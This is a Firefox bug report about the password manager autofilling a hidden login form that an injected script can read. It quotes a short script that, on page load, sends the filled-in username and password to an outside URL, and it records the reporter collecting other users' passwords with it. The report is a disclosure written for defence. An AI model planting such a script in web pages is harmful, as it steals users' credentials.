Closed Bug 504047 Opened 16 years ago Closed 4 years ago

Password manager allows third party scripts to get passwords

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Version:
3.5 Branch
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED INCOMPLETE

People

(Reporter: buri.buster, Unassigned)

References

(
URL
)

Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1) Gecko/20090624 Firefox/3.5 AutoPager/0.5.2.2 (http://www.teesoft.info/) Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.1) Gecko/20090624 Firefox/3.5 AutoPager/0.5.2.2 (http://www.teesoft.info/) I've been browsing a webpage (forum that i trust), where the noticeboards are made by users. There is no blocking for html elements, including scripts. Problem is following: noticeboard has the same login form as the entire page and some XHR object. Password manager automatically fills in login informations and allows XHR to send them to third party site. Reproducible: Always Steps to Reproduce: 1. Here is the sample code from that site. Login form is the same as the page's one, the Request() is XHR object. Site is using MooTools framework (http://www.mootools.net) <script type="text/javascript"> var r = new Request({url:'http://my.site.com', method:'get'});window.addEvent('load', function(e){ r.send('u=' + $('login').value + '&p=' + $('pass').value); }); </script> <form class='profile-form' action='/' style="display:none;" method='post' onsubmit='return md5form(this)'> <input type="hidden" name="challenge" value="52260" /> <input type="hidden" name="password_hmac" value="" /> <input type='hidden' name='log_process' value='1' /> <label>Login : <input type='text' name='login' id="login" /></label> <label>Heslo : <input type='password' name='pass' id="pass" /></label> <input type='submit' value='Přihlásit' id='profile-button' /> </form> Actual Results: I've obtained passwords for multiple profiles of other people. Expected Results: Login forms should be filled just graphically, until "Log-in" is pressed, or something like that.
Version: unspecified → 3.5 Branch
I just constructed a test case for this at http://www.kylehuey.com/moz/504047.php . Confirming. I don't see any way to take advantage of this without an XSS vulnerability in the host site though, which it sounds like that forum is full of.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Opera-like sending login information only on keyboard shortcut would prevent this glitch. If page tries to send login form, user can get prompted or emty fields could be send.

Marking this as Resolved > Incomplete since the last activity on this issue was 13 years ago and it might not be relevant anymore.
Feel free to re-open if the issue is still reproducible on your end in the latest FF versions.

Status: NEW → RESOLVED
Closed: 4 years ago
Resolution: --- → INCOMPLETE
You need to log in before you can comment on or make changes to this bug.